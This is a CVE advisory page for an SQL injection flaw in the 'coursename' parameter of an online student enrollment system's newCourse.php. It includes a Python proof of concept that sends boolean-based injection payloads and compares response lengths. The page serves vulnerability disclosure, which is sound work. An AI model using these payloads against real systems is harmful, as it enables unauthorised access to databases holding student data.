Security Vulnerability Report
中文
CVE-2026-36234 CVSS 9.8 CRITICAL

CVE-2026-36234

Published: 2026-04-10 15:16:25
Last Modified: 2026-04-14 17:40:46

Description

itsourcecode Online Student Enrollment System v1.0 is vulnerable to SQL Injection in newCourse.php via the 'coursename' parameter.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:itsourcecode:online_student_enrollment_system:1.0:*:*:*:*:*:*:* - VULNERABLE
itsourcecode Online Student Enrollment System v1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-36234 # Target: itsourcecode Online Student Enrollment System v1.0 # Vulnerable File: newCourse.php # Vulnerable Parameter: coursename import requests def check_sqli(url): # Target endpoint target = f"{url}/newCourse.php" # Payload to test for SQL Injection (Boolean-based) # Checks if the query returns True (1=1) vs False (1=2) payload_true = "test' OR '1'='1" payload_false = "test' OR '1'='2" data = { "coursename": payload_true } try: print(f"[*] Sending payload to {target}...") response = requests.post(target, data=data) # Analyze response (logic depends on application behavior) if response.status_code == 200: print("[+] Request sent successfully. Check application response for differences.") print(f"[+] Response Length (True): {len(response.text)}") # Send False payload for comparison data['coursename'] = payload_false response_false = requests.post(target, data=data) print(f"[-] Response Length (False): {len(response_false.text)}") if len(response.text) != len(response_false.text): print("[!] Potential SQL Injection found via response length difference.") else: print(f"[-] Server returned status code: {response.status_code}") except Exception as e: print(f"Error: {e}") if __name__ == "__main__": target_url = "http://target-ip" # Replace with actual target IP check_sqli(target_url)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-36234", "sourceIdentifier": "[email protected]", "published": "2026-04-10T15:16:24.953", "lastModified": "2026-04-14T17:40:46.070", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "itsourcecode Online Student Enrollment System v1.0 is vulnerable to SQL Injection in newCourse.php via the 'coursename' parameter."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:itsourcecode:online_student_enrollment_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "206B072E-A37F-4569-B5E1-B2305B37DB95"}]}]}], "references": [{"url": "https://github.com/Amorsec/CVE-PHP/blob/main/itsourcecode-Online_Student_Enrollment_System_in_newCourse.php_sql_injection.pdf", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Third Party Advisory"]}]}}